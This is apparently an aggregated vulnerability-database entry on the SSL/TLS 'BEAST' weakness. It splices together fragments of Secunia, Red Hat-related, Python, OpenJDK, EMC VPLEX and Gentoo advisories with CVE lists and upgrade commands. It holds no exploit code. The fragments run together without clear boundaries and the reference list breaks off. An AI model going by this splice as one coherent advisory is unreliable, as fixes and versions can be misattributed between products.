Reference(s) http://secunia.com/advisories/45593/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=45593 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Red Hat has issued an update for flash-plugin. This fixes multiple vulnerabilities, which can be exploited by malicious people to disclose sensitive information and compromise a user's system. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ORIGINAL ADVISORY: RHSA-2011:1144-1: https://rhn.redhat.com/errata/RHSA-2011-1144.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor
var-201109-0130 The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. A vulnerability in the specification of the SSL 3.0 and TLS 1.0 protocols could allow an attacker to decrypt encrypted traffic. SSL Protocol and TLS The protocol includes CBC There are vulnerabilities that are subject to selective plaintext attacks in mode. SSL Protocol and TLS Protocol is CBC Initialization vector when operating in mode (IV) There is a problem in the determination method, and there is a vulnerability that is subject to selective plaintext attacks. Attack methods using this vulnerability have been released.Encrypted communication is a man-in-the-middle attack (man-in-the-middle attack) If they are intercepted by you, their content may be decrypted. This will result in a false sense of security, and potentially result in the disclosure of sensitive information. ---------------------------------------------------------------------- SC World Congress, New York, USA, 16 November 2011 Visit the Secunia booth (#203) and discover how you can improve your handling of third party programs: http://secunia.com/resources/events/sc_2011/ ---------------------------------------------------------------------- TITLE: IBM Lotus Domino SSL/TLS Initialization Vector Selection Weakness SECUNIA ADVISORY ID: SA46791 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46791/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46791 RELEASE DATE: 2011-11-11 DISCUSS ADVISORY: http://secunia.com/advisories/46791/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46791/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46791 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness has been reported in IBM Lotus Domino, which can be exploited by malicious people to disclose potentially sensitive information and hijack a user's session. For more information: SA46168 The vulnerability is reported in versions 8.0, 8.5, 8.5.1, 8.5.2, and 8.5.3. SOLUTION: As a workaround enable RC4 encryption (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Thai Duong and Juliano Rizzo ORIGINAL ADVISORY: IBM: http://www.ibm.com/support/docview.wss?uid=swg21568229 IBM ISS X-Force: http://xforce.iss.net/xforce/xfdb/70069 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . A flaw was found in the way the Python SimpleHTTPServer module generated directory listings. An attacker able to upload a file with a specially-crafted name to a server could possibly perform a cross-site scripting (XSS) attack against victims visiting a listing page generated by SimpleHTTPServer, for a directory containing the crafted file (if the victims were using certain web browsers) (CVE-2011-4940). A race condition was found in the way the Python distutils module set file permissions during the creation of the .pypirc file. If a local user had access to the home directory of another user who is running distutils, they could use this flaw to gain access to that user&#039;s .pypirc file, which can contain usernames and passwords for code repositories (CVE-2011-4944). A flaw was found in the way the Python SimpleXMLRPCServer module handled clients disconnecting prematurely. A remote attacker could use this flaw to cause excessive CPU consumption on a server using SimpleXMLRPCServer (CVE-2012-0845). Hash table collisions CPU usage DoS for the embedded copy of expat (CVE-2012-0876). A denial of service flaw was found in the implementation of associative arrays (dictionaries) in Python. An attacker able to supply a large number of inputs to a Python application (such as HTTP POST request parameters sent to a web application) that are used as keys when inserting data into an array could trigger multiple hash function collisions, making array operations take an excessive amount of CPU time. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions (CVE-2012-1150). The updated packages have been patched to correct these issues. The verification of md5 checksums and GPG signatures is performed automatically for you. CVE-2011-3521 The CORBA implementation contains a deserialization vulnerability in the IIOP implementation, allowing untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3544 The Java scripting engine lacks necessary security manager checks, allowing untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3547 The skip() method in java.io.InputStream uses a shared buffer, allowing untrusted Java code (such as applets) to access data that is skipped by other code. CVE-2011-3548 The java.awt.AWTKeyStroke class contains a flaw which allows untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3551 The Java2D C code contains an integer overflow which results in a heap-based buffer overflow, potentially allowing untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3552 Malicous Java code can use up an excessive amount of UDP ports, leading to a denial of service. CVE-2011-3553 JAX-WS enables stack traces for certain server responses by default, potentially leaking sensitive information. CVE-2011-3554 JAR files in pack200 format are not properly checked for errors, potentially leading to arbitrary code execution when unpacking crafted pack200 files. CVE-2011-3556 The RMI Registry server lacks access restrictions on certain methods, allowing a remote client to execute arbitary code. CVE-2011-3557 The RMI Registry server fails to properly restrict privileges of untrusted Java code, allowing RMI clients to elevate their privileges on the RMI Registry server. CVE-2011-3560 The com.sun.net.ssl.HttpsURLConnection class does not perform proper security manager checks in the setSSLSocketFactory() method, allowing untrusted Java code to bypass security policy restrictions. For the stable distribution (squeeze), this problem has been fixed in version 6b18-1.8.10-0+squeeze1. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 6b23~pre11-1. Details: \x95Multiple Vulnerabilities affecting the VPLEX Web GUI. Please refer to the NVD website (http://web.nvd.nist.gov/) for more details on the below CVEs Path Traversal vulnerability in VPLEX GUI \x96 CVE-2014-0632 CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C) VPLEX GUI Session Timeout validity vulnerability \x96 CVE-2014-0633 CVSS v2 Base Score: 7.7 (AV:A/AC:L/Au:S/C:C/I:C/A:C) Missing HttpOnly attribute vulnerability \x96 CVE-2014-0634 CVSS v2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P) Session Fixation vulnerability \x96 CVE-2014-0635 CVSS v2 Base Score: 7.5 (AV:N/AC:M/Au:S/C:C/I:P/A:P) BEAST Attack \x96 CVE-2011-3389 CVSS v2 Base Score: See NVD advisory for the CVSS score. \x95Multiple Embedded Component Vulnerabilities Multiple vulnerabilities in the following embedded components of the SLES Operating System have been fixed: Kernel: CVE-2011-1044, CVE-2011-4110, CVE-2012-2136 perl: CVE-2002-2443 krb5: CVE-2013-1667 bind packages: CVE-2012-5166 CVSS v2 Base Score: See NVD advisory for the individual CVSS scores. Remote Information Disclosure vulnerability in OpenSSH - CVE-2012-0814 CVSS v2 Base Score: See NVD advisory for the CVSS score. Multiple vulnerabilities in Oracle Java and Apache Tomcat: This release also contains critical security updates for Oracle Java and Apache Tomcat. Oracle Java has been upgraded to 1.6.0_45 and Apache tomcat has been upgraded to 6.0.36. Please refer the following links for more information: Java: http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html Tomcat: https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.36 CVSS v2 Base Score: See vendor advisory for the individual CVSS scores. Resolution: EMC recommends all customers to upgrade to VPLEX GeoSynchrony version 5.3 at their earliest opportunity. Link to remedies: Customers can download the software from Support Zone. Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201301-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mozilla Products: Multiple vulnerabilities Date: January 08, 2013 Bugs: #180159, #181361, #207261, #238535, #246602, #251322, #255221, #255234, #255687, #257577, #260062, #261386, #262704, #267234, #273918, #277752, #280226, #280234, #280393, #282549, #284439, #286721, #290892, #292034, #297532, #305689, #307045, #311021, #312361, #312645, #312651, #312675, #312679, #312763, #313003, #324735, #326341, #329279, #336396, #341821, #342847, #348316, #357057, #360055, #360315, #365323, #373595, #379549, #381245, #388045, #390771, #395431, #401701, #403183, #404437, #408161, #413657, #419917, #427224, #433383, #437780, #439586, #439960, #444318 ID: 201301-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner, some of which may allow execution of arbitrary code or local privilege escalation. Background ========== Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla's Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/firefox < 10.0.11 >= 10.0.11 2 www-client/firefox-bin < 10.0.11 >= 10.0.11 3 mail-client/thunderbird < 10.0.11 >= 10.0.11 4 mail-client/thunderbird-bin < 10.0.11 >= 10.0.11 5 www-client/seamonkey < 2.14-r1 >= 2.14-r1 6 www-client/seamonkey-bin < 2.14 >= 2.14 7 dev-libs/nss < 3.14 >= 3.14 8 www-client/mozilla-firefox <= 3.6.8 Vulnerable! 9 www-client/mozilla-firefox-bin <= 3.5.6 Vulnerable! 10 mail-client/mozilla-thunderbird <= 3.0.4-r1 Vulnerable! 11 mail-client/mozilla-thunderbird-bin <= 3.0 Vulnerable! 12 www-client/icecat <= 10.0-r1 Vulnerable! 13 net-libs/xulrunner <= 2.0-r1 Vulnerable! 14 net-libs/xulrunner-bin <= 1.8.1.19 Vulnerable! ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 14 affected packages Description =========== Multiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Impact ====== A remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL's for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser's font, conduct clickjacking attacks, or have other unspecified impact. A local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. Workaround ========== There is no known workaround at this time. Resolution ========== All Mozilla Firefox users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11" All users of the Mozilla Firefox binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"= All Mozilla Thunderbird users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11" All users of the Mozilla Thunderbird binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11" All Mozilla SeaMonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.14-r1" All users of the Mozilla SeaMonkey binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-2.14" All NSS users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/nss-3.14" The "www-client/mozilla-firefox" package has been merged into the "www-client/firefox" package. To upgrade, please unmerge "www-client/mozilla-firefox" and then emerge the latest "www-client/firefox" package: # emerge --sync # emerge --unmerge "www-client/mozilla-firefox" # emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11" The "www-client/mozilla-firefox-bin" package has been merged into the "www-client/firefox-bin" package. To upgrade, please unmerge "www-client/mozilla-firefox-bin" and then emerge the latest "www-client/firefox-bin" package: # emerge --sync # emerge --unmerge "www-client/mozilla-firefox-bin" # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"= The "mail-client/mozilla-thunderbird" package has been merged into the "mail-client/thunderbird" package. To upgrade, please unmerge "mail-client/mozilla-thunderbird" and then emerge the latest "mail-client/thunderbird" package: # emerge --sync # emerge --unmerge "mail-client/mozilla-thunderbird" # emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11" The "mail-client/mozilla-thunderbird-bin" package has been merged into the "mail-client/thunderbird-bin" package. To upgrade, please unmerge "mail-client/mozilla-thunderbird-bin" and then emerge the latest "mail-client/thunderbird-bin" package: # emerge --sync # emerge --unmerge "mail-client/mozilla-thunderbird-bin" # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11" Gentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: # emerge --unmerge "www-client/icecat" Gentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: # emerge --unmerge "net-libs/xulrunner" Gentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: # emerge --unmerge "net-libs/xulrunner-bin" References ========== [ 1 ] CVE-2011-3101 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3101 [ 2 ] CVE-2007-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2436 [ 3 ] CVE-2007-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2437 [ 4 ] CVE-2007-2671 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2671 [ 5 ] CVE-2007-3073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3073 [ 6 ] CVE-2008-0016 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0016 [ 7 ] CVE-2008-0017 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0017 [ 8 ] CVE-2008-0367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0367 [ 9 ] CVE-2008-3835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3835 [ 10 ] CVE-2008-3836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3836 [ 11 ] CVE-2008-3837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3837 [ 12 ] CVE-2008-4058 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4058 [ 13 ] CVE-2008-4059 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4059 [ 14 ] CVE-2008-4060 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4060 [ 15 ] CVE-2008-4061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4061 [ 16 ] CVE-2008-4062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4062 [ 17 ] CVE-2008-4063 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4063 [ 18 ] CVE-2008-4064 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4064 [ 19 ] CVE-2008-4065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4065 [ 20 ] CVE-2008-4066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4066 [ 21 ] CVE-2008-4067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4067 [ 22 ] CVE-2008-4068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4068 [ 23 ] CVE-2008-4069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4069 [ 24 ] CVE-2008-4070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4070 [ 25 ] CVE-2008-4582 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4582 [ 26 ] CVE-2008-5012 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5012 [ 27 ] CVE-2008-5013 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5013 [ 28 ] CVE-2008-5014 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5014 [ 29 ] CVE-2008-5015 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5015 [ 30 ] CVE-2008-5016 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5016 [ 31 ] CVE-2008-5017 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5017 [ 32 ] CVE-2008-5018 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5018 [ 33 ] CVE-2008-5019 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5019 [ 34 ] CVE-2008-5021 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5021 [ 35 ] CVE-2008-5022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5022 [ 36 ] CVE-2008-5023 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5023 [ 37 ] CVE-2008-5024 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5024 [ 38 ] CVE-2008-5052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5052 [ 39 ] CVE-2008-5500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5500 [ 40 ] CVE-2008-5501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5501 [ 41 ] CVE-2008-5502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5502 [ 42 ] CVE-2008-5503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5503 [ 43 ] CVE-2008-5504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5504 [ 44 ] CVE-2008-5505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5505 [ 45 ] CVE-2008-5506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5506 [ 46 ] CVE-2008-5507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5507 [ 47 ] CVE-2008-5508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5508 [ 48 ] CVE-2008-5510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5510 [ 49 ] CVE-2008-5511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5511 [ 50 ] CVE-2008-5512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5512 [ 51 ] CVE-2008-5513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5513 [ 52 ] CVE-2008-5822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5822 [ 53 ] CVE-2008-5913 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5913 [ 54 ] CVE-2008-6961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6961 [ 55 ] CVE-2009-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071 [ 56 ] CVE-2009-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071 [ 57 ] CVE-2009-0352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0352 [ 58 ] CVE-2009-0353 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0353 [ 59 ] CVE-2009-0354 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0354 [ 60 ] CVE-2009-0355 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0355 [ 61 ] CVE-2009-0356 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0356 [ 62 ] CVE-2009-0357 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0357 [ 63 ] CVE-2009-0358 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0358 [ 64 ] CVE-2009-0652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0652 [ 65 ] CVE-2009-0771 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0771 [ 66 ] CVE-2009-0772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0772 [ 67 ] CVE-2009-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0773 [ 68 ] CVE-2009-0774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0774 [ 69 ] CVE-2009-0775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0775 [ 70 ] CVE-2009-0776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0776 [ 71 ] CVE-2009-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0777 [ 72 ] CVE-2009-1044 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1044 [ 73 ] CVE-2009-1169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1169 [ 74 ] CVE-2009-1302 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1302 [ 75 ] CVE-2009-1303 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1303 [ 76 ] CVE-2009-1304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1304 [ 77 ] CVE-2009-1305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1305 [ 78 ] CVE-2009-1306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1306 [ 79 ] CVE-2009-1307 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1307 [ 80 ] CVE-2009-1308 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1308 [ 81 ] CVE-2009-1309 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1309 [ 82 ] CVE-2009-1310 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1310 [ 83 ] CVE-2009-1311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1311 [ 84 ] CVE-2009-1312 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1312 [ 85 ] CVE-2009-1313 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1313 [ 86 ] CVE-2009-1392 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1392 [ 87 ] CVE-2009-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1563 [ 88 ] CVE-2009-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1571 [ 89 ] CVE-2009-1828 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1828 [ 90 ] CVE-2009-1832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1832 [ 91 ] CVE-2009-1833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1833 [ 92 ] CVE-2009-1834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1834 [ 93 ] CVE-2009-1835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1835 [ 94 ] CVE-2009-1836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1836 [ 95 ] CVE-2009-1837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1837 [ 96 ] CVE-2009-1838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1838 [ 97 ] CVE-2009-1839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1839 [ 98 ] CVE-2009-1840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1840 [ 99 ] CVE-2009-1841 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1841 [ 100 ] CVE-2009-2043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2043 [ 101 ] CVE-2009-2044 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2044 [ 102 ] CVE-2009-2061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2061 [ 103 ] CVE-2009-2065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2065 [ 104 ] CVE-2009-2210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2210 [ 105 ] CVE-2009-2404 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2404 [ 106 ] CVE-2009-2408 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2408 [ 107 ] CVE-2009-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2462 [ 108 ] CVE-2009-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2463 [ 109 ] CVE-2009-2464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2464 [ 110 ] CVE-2009-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2465 [ 111 ] CVE-2009-2466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2466 [ 112 ] CVE-2009-2467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2467 [ 113 ] CVE-2009-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2469 [ 114 ] CVE-2009-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2470 [ 115 ] CVE-2009-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2471 [ 116 ] CVE-2009-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2472 [ 117 ] CVE-2009-2477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2477 [ 118 ] CVE-2009-2478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2478 [ 119 ] CVE-2009-2479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2479 [ 120 ] CVE-2009-2535 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2535 [ 121 ] CVE-2009-2654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2654 [ 122 ] CVE-2009-2662 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2662 [ 123 ] CVE-2009-2664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2664 [ 124 ] CVE-2009-2665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2665 [ 125 ] CVE-2009-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3069 [ 126 ] CVE-2009-3070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3070 [ 127 ] CVE-2009-3071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3071 [ 128 ] CVE-2009-3072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3072 [ 129 ] CVE-2009-3074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3074 [ 130 ] CVE-2009-3075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3075 [ 131 ] CVE-2009-3076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3076 [ 132 ] CVE-2009-3077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3077 [ 133 ] CVE-2009-3078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3078 [ 134 ] CVE-2009-3079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3079 [ 135 ] CVE-2009-3274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3274 [ 136 ] CVE-2009-3371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3371 [ 137 ] CVE-2009-3372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3372 [ 138 ] CVE-2009-3373 